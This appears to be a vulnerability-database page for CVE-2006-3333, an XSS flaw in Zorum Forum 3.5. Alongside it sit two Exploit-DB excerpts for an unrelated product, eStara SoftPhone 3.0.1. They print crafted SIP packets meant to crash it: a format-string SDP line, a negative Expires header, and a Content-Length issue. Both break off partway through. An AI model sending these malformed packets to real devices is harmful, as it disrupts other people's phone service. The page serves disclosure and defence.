CVE-2006-3333
published 2006-06-30CVE-2006-3333: Cross-site scripting (XSS) vulnerability in index.php in Zorum Forum 3.5 allows remote attackers to inject web script or HTML via the multiple unspecified…
PriorityP46low2.6CVSS 2.0
AVNACHAuNCNIPAN
EPSS
0.82%
52.5th percentile
Cross-site scripting (XSS) vulnerability in index.php in Zorum Forum 3.5 allows remote attackers to inject web script or HTML via the multiple unspecified parameters, including the (1) frommethod, (2) list, and (3) method, which are reflected in an error message. NOTE: some of these vectors might be resultant from SQL injection.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpoutsourcing | zorum | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
eStara SoftPhone 3.0.1 - SIP SDP Message Handling Format String Denial of Service
exploitdb·2006-02-14
CVE-2006-0738 eStara SoftPhone 3.0.1 - SIP SDP Message Handling Format String Denial of Service
eStara SoftPhone 3.0.1 - SIP SDP Message Handling Format String Denial of Service
---
source: https://www.securityfocus.com/bid/16629/info
eStara Smartphone is prone to multiple denial-of-service vulnerabilities when processing malformed VOIP headers. Successful exploitation will cause the device to crash.
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00003013z9hG4bK.00003B37
From: 3013 ;tag=3013
To: zwell
Call-ID: [email protected]
CSeq: 21086 INVITE
Content-Type: application/sdp
Content-Length: 134
v=0
o=3013 3013 3013 %s%x%n IP4 172.16.3.6
s=Session SDP
c=IN IP4 172.16.3.6
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00003013z9hG4bK.00003B37
From: 3013 ;tag=3013
To: zw
Exploit-DB
eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities
exploitdb·2006-02-14
CVE-2006-0737 eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities
eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities
---
source: https://www.securityfocus.com/bid/16629/info
eStara Smartphone is prone to multiple denial-of-service vulnerabilities when processing malformed VOIP headers. Successful exploitation will cause the device to crash.
For the negative 'Expires' field issue:
OPTIONS sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3334;branch=z9hG4bK00001793z9hG4bK.00001FDB
From: 1793 ;tag=1793
To: zwell
Call-ID: [email protected]
CSeq: 5185 OPTIONS
Expires: -127
For the 'Content-Length' field issue:
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00002386z9hG4bK.0000234E
From: 2386 ;tag=2386
To: zwell
Call-ID: [email protected]
CSeq: 4896 INVITE
Content-Type: applicati
No writeups or analysis indexed.
2006-06-30
Published